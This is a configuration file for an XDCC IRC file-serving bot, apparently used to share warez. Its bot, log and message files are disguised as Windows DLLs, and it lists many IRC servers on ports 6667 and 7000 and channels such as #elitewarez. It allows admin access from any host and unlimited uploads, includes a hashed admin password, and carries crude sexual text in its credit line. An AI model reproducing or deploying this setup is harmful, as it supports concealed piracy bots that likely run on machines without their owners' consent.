xdccfile .\bot32.dll 
pidfile .\x32.dll 
#logfile .\IGNO32.dll 
logstats no 
logrotate weekly 
messagefile .\msg32.dll 
ignorefile .\igno32.dll 
connectionmethod direct 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server irc.insiderz.net 6667 
server irc.insiderz.net 7000 
server 64.246.40.8 6667 
server 64.246.40.8 7000 
server 64.246.40.8 6667 
server 64.246.40.8 7000 
server 64.246.38.96 6667 
server 64.246.38.96 6667 
server 64.246.38.96 7000 
server 64.246.38.96 7000 
server 216.127.86.6 7000 
server 216.127.86.6 7000 
server 216.127.86.6 6667 
server 216.127.86.6 6667 
server 216.40.243.73 6667 
server 216.40.243.73 7000 
server 216.40.243.73 6667 
server 216.40.243.73 7000 
server 66.227.110.218 6667 
server 66.227.110.218 7000 
server 66.227.110.218 6667 
server 66.227.110.218 7000 
server 194.218.168.240 7000 
server 194.218.168.240 7000 
server 194.218.168.240 6667 
server 194.218.168.240 6667 
server 64.246.11.60 6667 
server 64.246.11.60 6667 
server 64.246.11.60 7000 
server 64.246.11.60 7000 
channel #elitewarez -plist 31 -pformat full 
channel #ewg 
channel #CjB 
user_realname if exists: /home/cell/penis  /y ;] 
user_modes +i 
loginname EWG 
slotsmax 10 
queuesize 5 
slotsmaxpack 10 
slotsmaxslots 10 
slotsmaxqueue 5 
maxtransfersperperson 2 
maxqueueditemsperperson 2 
filedir ..\dll 
restrictlist yes 
restrictsend yes 
lowbdwth 0 
overallminspeed 0.0 
transfermaxspeed 3000.0 
overallmaxspeed 0 
overallmaxspeeddayspeed 0 
overallmaxspeeddaytime 9 17 
overallmaxspeeddaydays MTWRF 
debug no 
autosend no 
autoword blah 
automsg blah 
autopack 1 
xdccautosavetime 30 
creditline 15,1*14[15EWG14]15* 14MmM. My PuSSy Is WeT From To0 Much Sends. ;/ 15*14[15EWG14]15* 
adminpass JpcHXjZfyeyyc 
adminhost *!*@* 
uploadallowed yes 
uploaddir ..\dll 
uploadmaxsize 0 
